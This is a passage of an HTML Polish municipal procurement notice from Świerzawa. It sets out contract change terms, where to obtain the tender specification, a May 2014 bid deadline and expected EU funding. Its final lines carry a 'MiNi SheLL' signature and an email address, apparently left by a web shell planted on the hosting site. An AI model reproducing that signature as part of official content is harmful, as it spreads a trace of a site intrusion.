4)  wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany w siwz, nie powodujących zmiany ceny umownej oraz ceny jednostkowej
5) Urzędowej zmiany stawki podatku od towarów i usług (VAT) - dotyczy tylko usług wykonanych i fakturowanych po dacie wprowadzenia nowej stawki od towarów i usług VAT),
6) Sporządzenia aneksu do umowy nie wymaga : zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego), zmiana kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu w przypadku pisemnego wyrażenia zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swierzawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Świerzawie 
Plac Wolności 60 
 59-540 Świerzawa
( I piętro pok. nr 5 Referat Inwestycji ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2014 godzina 12:00, miejsce: Urząd Miasta i Gminy w Świerzawie 
Plac Wolności 60 
 59-540 Świerzawa
( II piętro pok. nr 10 sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja przewidywana jest do objęcia dofinansowaniem ze środków unijnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com